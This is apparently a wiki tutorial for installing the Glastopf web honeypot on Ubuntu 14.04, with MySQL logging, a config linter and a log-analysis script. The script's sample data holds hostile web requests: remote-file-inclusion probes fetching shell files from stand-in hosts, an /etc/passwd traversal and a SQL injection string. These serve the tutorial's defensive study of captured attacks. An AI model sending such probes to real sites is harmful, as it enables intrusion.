Installing Glastopf web honeypot on Ubuntu Server 14.04

From Zam Wiki
Revision as of 15:20, 3 November 2014 by Zam (talk | contribs) (Install and configure the PHP sandbox)

Prerequisites

Install the dependencies

apt-get update
apt-get install python2.7 python-openssl python-gevent libevent-dev python2.7-dev build-essential make liblapack-dev libmysqlclient-dev python-chardet python-requests python-sqlalchemy python-lxml python-beautifulsoup mongodb python-pip python-dev python-numpy python-setuptools python-numpy-dev python-scipy libatlas-dev g++ git php5 php5-dev gfortran mysql-server python-mysqldb libxml2 libxslt-dev libffi-dev -y
pip install --upgrade distribute
pip install --upgrade gevent webob pyopenssl chardet lxml sqlalchemy jinja2 beautifulsoup requests requires cssselect pymongo MySQL-python pylibinjection libtaxii greenlet

Install HpFeeds

cd /opt
git clone https://github.com/rep/hpfeeds.git
cd hpfeeds
python setup.py build
python setup.py install

Install and configure the PHP sandbox

Download using git:

cd /opt
git clone https://github.com/glastopf/BFR.git
cd BFR
sudo phpize
sudo ./configure --enable-bfr
sudo make
sudo make install

Open the php.ini used by the PHP command-line binary (/etc/php5/cli/php.ini on Ubuntu 14.04; Glastopf drives the sandbox through the php command, so the Apache php.ini is irrelevant here) and register the extension with the path that make install printed. The directory name carries the Zend API version (20121212 for the PHP 5.5 that ships with 14.04), so copy it from your own build output rather than from here. Afterwards bfr should appear in the module list printed by php -m.

zend_extension = /usr/lib/php5/20121212/bfr.so

Download glastopf source code from git

cd /opt
sudo git clone https://github.com/glastopf/glastopf.git

Install pylibinjection

cd /opt
git clone --recursive https://github.com/glastopf/pylibinjection.git
rm /opt/pylibinjection/src/pylibinjection.c
cd pylibinjection/
python setup.py build
python setup.py install

Install distribute manually

Glastopf's setup.py expects the legacy distribute package. The 0.7.3 version that pip installed above is only a compatibility shim around setuptools and breaks the build, so remove it together with the setuptools it pulled in and install distribute 0.6.35 from source:

sudo rm -rf /usr/local/lib/python2.7/dist-packages/distribute-0.7.3-py2.7.egg-info/
sudo rm -rf /usr/local/lib/python2.7/dist-packages/setuptools*
cd /opt
sudo wget https://pypi.python.org/packages/source/d/distribute/distribute-0.6.35.tar.gz
sudo tar -xzvf distribute-0.6.35.tar.gz
cd distribute-0.6.35
sudo python setup.py build
sudo python setup.py install 

Install glastopf

cd /opt/glastopf
sudo python setup.py build
sudo python setup.py install

Configuration

Prepare glastopf environment:

cd /opt
sudo mkdir glaspot
cd glaspot
sudo glastopf-runner

The first run creates a default glastopf.cfg in the work directory (/opt/glaspot) and immediately starts the honeypot on port 8080. Stop it with Ctrl-C, then customize the file as required before restarting.

Testing the Honeypot

Start Glastopf from your work directory (/opt/glaspot above):

sudo glastopf-runner

Use your web browser to visit your honeypot on port 8080 (the default until you change it below). You should see output like the following on the command line; the work directory in the first line will be your own, and the two hpfeeds lines only appear when the hpfeeds reporter is enabled in glastopf.cfg:

2013-05-21 08:34:08,129 (glastopf.glastopf) Initializing Glastopf using "/opt/myhoneypot" as work directory.
2013-05-21 08:34:08,130 (glastopf.glastopf) Connecting to main database with: sqlite:///db/glastopf.db
2013-05-21 08:34:08,152 (glastopf.modules.reporting.auxiliary.log_hpfeeds) Connecting to feed broker.
2013-05-21 08:34:08,227 (glastopf.modules.reporting.auxiliary.log_hpfeeds) Connected to hpfeed broker.
2013-05-21 08:34:11,265 (glastopf.glastopf) Glastopf started and privileges dropped.

Advanced

Google Index

Glastopf emulates the kinds of vulnerable scripts that attackers locate with Google dorks, so it only attracts real attacks once Google has indexed it. To get the honeypot into the index, submit its URL in Google Webmaster Tools; the site is registered there and Googlebot crawls it. Then sit back and wait for the first attacks to show up.

Log to MySQL

If you prefer a MySQL database instead of SQLite, you need a MySQL server. The dependency step above already installed it; if you skipped that step:

sudo apt-get install mysql-server python-mysqldb

Then create new db & user with its privileges:

mysql -u root -p

mysql> create database glaspot;
Query OK, 1 row affected (0.00 sec)

mysql> create user 'glaspot'@'localhost' identified by 'glaspot';
Query OK, 0 rows affected (0.00 sec)

mysql> grant all privileges on glaspot.* to 'glaspot'@'localhost';
Query OK, 0 rows affected (0.00 sec)

mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)

mysql> exit
Bye

The mysql-server installation prompts for the MySQL root password, and the CREATE USER statement above sets the password of the honeypot account. Use strong passwords for both; the 'glaspot' password above is only a placeholder to be replaced. The honeypot host is deliberately exposed to the internet, so also keep MySQL bound to 127.0.0.1 (the Ubuntu default bind-address) so that only the local Glastopf process can reach it.

Configure the glastopf.cfg file

The file to edit is glastopf.cfg in the work directory (/opt/glaspot above; the first run of glastopf-runner created it). It contains many settings that can be changed as needed; the two that matter here are the listener and the database.

  • First, move Glastopf from the default port 8080 to port 80:

Beware: make sure no other service (Apache, for example) is listening on port 80; if one is, bind it to another port or stop it. Port 80 is privileged, so start glastopf-runner with sudo: it binds the socket as root and then drops to the uid and gid configured here, which must therefore not be root.

[webserver]
host = 0.0.0.0
port = 80
uid = nobody
gid = nogroup
proxy_enabled = False

This makes the honeypot look like an ordinary web application; scanners and crawlers probe port 80 and rarely bother with 8080.

  • Change the database option to log to MySQL instead of SQLite. The connection string has the form user:password@host/database, so it carries the password from the CREATE USER step in clear text; keep glastopf.cfg readable only by root:
[main-database]
#If disabled a sqlite database will be created (db/glastopf.db)
#to be used as dork storage.
enabled = True
#mongodb or sqlalchemy connection string, ex:
#mongodb://localhost:27017/glastopf
#mongodb://james:secret@localhost:27017/glastopf
#mysql://james:secret@localhost/glastopf
#connection_string = sqlite:///db/glastopf.db
connection_string = mysql://glaspot:glaspot@localhost/glaspot
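A quick way to catch the mistakes this section warns about (a privileged port with no non-root user to drop to, the runner left on 8080, a throwaway database password, a database reached over the network from an exposed host) is to lint the finished file. The following Python 3 script is an added example written for this guide and is not part of Glastopf; the embedded cfg text is a constructed copy of the two sections above, and the list of weak passwords is an assumption you should extend with your own defaults.

```python
"""Lint a glastopf.cfg before starting the honeypot.

Added example for this guide (Python 3), not part of glastopf. It reads the
[webserver] and [main-database] sections in the INI format glastopf uses
and flags: a privileged port with no non-root uid/gid to drop to, the
runner still on the default 8080, a trivial database password, and a
database reached over the network from an internet-exposed host.
"""
from configparser import ConfigParser
from urllib.parse import urlparse

# Constructed copy of the two sections as this guide leaves them: port 80,
# drop to nobody:nogroup, MySQL with the placeholder password 'glaspot'.
SAMPLE_CFG = """\
[webserver]
host = 0.0.0.0
port = 80
uid = nobody
gid = nogroup
proxy_enabled = False

[main-database]
enabled = True
connection_string = mysql://glaspot:glaspot@localhost/glaspot
"""

# Assumed list of throwaway passwords; extend it with your own defaults.
WEAK_PASSWORDS = {"", "glaspot", "glastopf", "password", "secret", "james"}
LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")


def check_config(text):
    """Return a list of (severity, message) findings for the given cfg text."""
    cfg = ConfigParser()
    cfg.read_string(text)
    findings = []

    port = cfg.getint("webserver", "port")
    uid = cfg.get("webserver", "uid")
    gid = cfg.get("webserver", "gid")
    if port < 1024 and "root" in (uid, gid):
        findings.append(("high", "port %d needs root to bind, but uid/gid %s:%s "
                         "never drop privileges" % (port, uid, gid)))
    elif port < 1024:
        findings.append(("info", "port %d is privileged: start glastopf-runner as "
                         "root; it drops to %s:%s after binding" % (port, uid, gid)))
    if port == 8080:
        findings.append(("low", "still on the default port 8080; a real web app "
                         "would answer on 80"))

    if cfg.getboolean("main-database", "enabled"):
        url = urlparse(cfg.get("main-database", "connection_string"))
        if url.scheme == "sqlite":
            # sqlite:///db/glastopf.db is a path relative to the work directory
            findings.append(("info", "logging to sqlite file %s in the work "
                             "directory" % url.path.lstrip("/")))
        else:
            if (url.password or "") in WEAK_PASSWORDS:
                findings.append(("high", "database user %r on %s uses a trivial "
                                 "or empty password" % (url.username, url.hostname)))
            if url.hostname not in LOCAL_HOSTS:
                findings.append(("medium", "database on %s is reached over the "
                                 "network from an internet-exposed host; restrict "
                                 "it to the honeypot's address" % url.hostname))
    return findings


if __name__ == "__main__":
    import sys
    # Pass the real file as the first argument; without one the sample is linted.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CFG
    for severity, message in check_config(text):
        print("[%s] %s" % (severity, message))
```

Run it as python3 checkcfg.py /opt/glaspot/glastopf.cfg after editing; the sample as shown yields one informational note about the privileged port and one high finding for the placeholder password.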

Fire Up!

  • Start Glastopf from the work directory (it needs root to bind port 80 and drops privileges once the socket is bound):
cd /opt/glaspot/
sudo python /usr/local/bin/glastopf-runner

To keep Glastopf running after you log out, start it in the background and detach it from the shell:

cd /opt/glaspot/
sudo python /usr/local/bin/glastopf-runner &
disown
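Once events start arriving it is more useful to read them back out of the database than to watch the console. The script below is an added example for this guide, not Glastopf code, and rests on two assumptions you should confirm against your own db/glastopf.db before relying on it: that the SQL reporting module writes an events table with the columns time, source (as ip:port), request_url, request_raw, pattern and filename, and that hits are classified with pattern names such as rfi, lfi, sqli and unknown. The rows it loads are constructed samples built from documentation IP ranges, not captured traffic; point sqlite3.connect at db/glastopf.db in the work directory to run it on real data (for the MySQL setup the same queries work through MySQLdb with the credentials from glastopf.cfg).

```python
"""Read back what a running Glastopf has logged.

Added example for this guide (Python 3), not glastopf code. Assumed, so
verify against your own database: glastopf's SQL reporting writes an
"events" table with columns id, time, source ("ip:port"), request_url,
request_raw, pattern and filename, and classifies hits with pattern names
such as rfi, lfi, sqli and unknown.
"""
import sqlite3
from collections import Counter
from urllib.parse import urlparse, parse_qsl

EVENTS_DDL = """
CREATE TABLE events (
    id INTEGER PRIMARY KEY,
    time TEXT, source TEXT, request_url TEXT,
    request_raw TEXT, pattern TEXT, filename TEXT)
"""

# Constructed sample rows (documentation IP ranges, not captured traffic):
# a plain crawler hit, two RFI probes, one LFI probe and one SQLi probe.
SAMPLE_EVENTS = [
    ("2014-11-03 15:20:01", "198.51.100.7:41022", "/",
     "GET / HTTP/1.1", "unknown", None),
    ("2014-11-03 15:20:09", "203.0.113.5:53311",
     "/index.php?page=http://203.0.113.5/x.txt?",
     "GET /index.php?page=http://203.0.113.5/x.txt? HTTP/1.1", "rfi", None),
    ("2014-11-03 15:20:12", "203.0.113.5:53312",
     "/index.php?page=../../../../etc/passwd",
     "GET /index.php?page=../../../../etc/passwd HTTP/1.1", "lfi", None),
    ("2014-11-03 15:21:40", "203.0.113.9:40001",
     "/index.php?id=1' OR '1'='1",
     "GET /index.php?id=1' OR '1'='1 HTTP/1.1", "sqli", None),
    ("2014-11-03 15:22:03", "203.0.113.9:40002",
     "/wp-content/plugins/x.php?cmd=http://198.51.100.22/shell.txt??",
     "GET /wp-content/plugins/x.php?cmd=http://198.51.100.22/shell.txt?? HTTP/1.1",
     "rfi", None),
]


def load_sample_db():
    """In-memory database filled with the constructed rows above.
    Replace with sqlite3.connect("db/glastopf.db") for a real work directory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(EVENTS_DDL)
    conn.executemany(
        "INSERT INTO events (time, source, request_url, request_raw, pattern, filename)"
        " VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_EVENTS)
    conn.commit()
    return conn


def summarise(conn, ignore=("unknown",)):
    """Count classified hits per attack pattern, per source IP and per URL."""
    by_pattern, by_source, by_url = Counter(), Counter(), Counter()
    for source, url, pattern in conn.execute(
            "SELECT source, request_url, pattern FROM events"):
        if pattern in ignore:
            continue
        ip = source.rsplit(":", 1)[0]   # strip the ephemeral client port
        by_pattern[pattern] += 1
        by_source[ip] += 1
        by_url[url] += 1
    return by_pattern, by_source, by_url


def rfi_payload_hosts(conn):
    """Hosts that served remote-file-inclusion payloads, taken from the URL
    the attacker asked the emulated vulnerable script to include."""
    hosts = set()
    for (url,) in conn.execute(
            "SELECT request_url FROM events WHERE pattern = 'rfi'"):
        for _name, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
            target = urlparse(value)
            if target.scheme in ("http", "https", "ftp") and target.hostname:
                hosts.add(target.hostname)
    return sorted(hosts)


if __name__ == "__main__":
    conn = load_sample_db()
    by_pattern, by_source, by_url = summarise(conn)
    print("hits per attack pattern:", dict(by_pattern))
    print("hits per source IP:", dict(by_source))
    print("most requested URLs:", by_url.most_common(3))
    print("hosts serving RFI payloads:", rfi_payload_hosts(conn))
```

The RFI payload hosts are the most actionable output: they are the servers hosting the attackers' shells, which is what you would report or feed into a blocklist, while the source IPs are frequently just other compromised machines.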

Troubleshooting

  • If you get this kind of error:
fatal error: libinjection.h: No such file or directory

during the glastopf installation, the pylibinjection build did not pick up the bundled libinjection sources (the --recursive clone is what fetches them). Remove the checkout and rebuild it:

cd /opt
sudo rm -rf pylibinjection
sudo git clone --recursive https://github.com/glastopf/pylibinjection.git
sudo rm /opt/pylibinjection/src/pylibinjection.c
cd pylibinjection/
sudo python setup.py build
sudo python setup.py install

Then run the glastopf setup again.
